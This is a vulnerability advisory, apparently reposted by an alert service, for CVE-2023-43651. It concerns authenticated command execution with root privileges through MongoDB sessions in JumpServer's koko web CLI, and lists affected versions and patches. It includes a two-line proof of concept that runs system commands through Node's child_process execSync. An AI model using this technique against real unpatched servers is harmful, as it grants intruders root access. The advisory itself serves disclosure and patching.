First published: Wed Sep 27 2023(Updated: )
### Impact An authenticated user can exploit a vulnerability in MongoDB sessions to execute arbitrary commands, leading to remote code execution. This vulnerability may further be leveraged to gain root privileges on the host system. ### Details Through the WEB CLI interface provided by koko, a user logs into the authorized mongoDB database and exploits the MongoDB session to execute arbitrary commands. ``` admin> const { execSync } = require("child_process") admin> console.log(execSync("id; hostname;").toString()) uid=0(root) gid=0(root) groups=0(root) jms_koko admin> ``` ### Patches Safe versions: - v2.28.20 - v3.7.1 ### Workarounds It is recommended to upgrade the safe versions. After upgrade, you can use the same method to check whether the vulnerability is fixed. ``` admin> console.log(execSync("id; hostname;").toString()) /bin/sh: line 1: /bin/hostname: Permission denied ``` ### References Thanks for **Oskar Zeino-Mahmalat** of [Sonar](https://sonarsource.com/) found and report this vulnerability
Credit: security-advisories@github.com security-advisories@github.com security-advisories@github.com
Affected Software | Affected Version | How to fix |
---|---|---|
Fit2cloud Jumpserver | >=2.0.0<2.28.20 | |
Fit2cloud Jumpserver | >=3.0.0<3.7.1 | |
go/github.com/jumpserver/koko | >=3.0.0<3.7.1 | 3.7.1 |
go/github.com/jumpserver/koko | >=2.0.0<2.28.20 | 2.28.20 |
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
CVE-2023-43651 is a vulnerability in the MongoDB sessions of JumpServer that allows an authenticated user to execute arbitrary commands and potentially gain root privileges on the system.
CVE-2023-43651 has a severity rating of 9.9 (Critical).
CVE-2023-43651 affects Fit2cloud JumpServer versions from 2.0.0 to 2.28.20 and versions from 3.0.0 to 3.7.1.
An authenticated user can exploit CVE-2023-43651 through the WEB CLI interface provided by JumpServer, allowing them to execute arbitrary commands and potentially gain root privileges.
Yes, it is recommended to update Fit2cloud JumpServer to a version that is not affected by CVE-2023-43651 or apply the necessary patches provided by the vendor.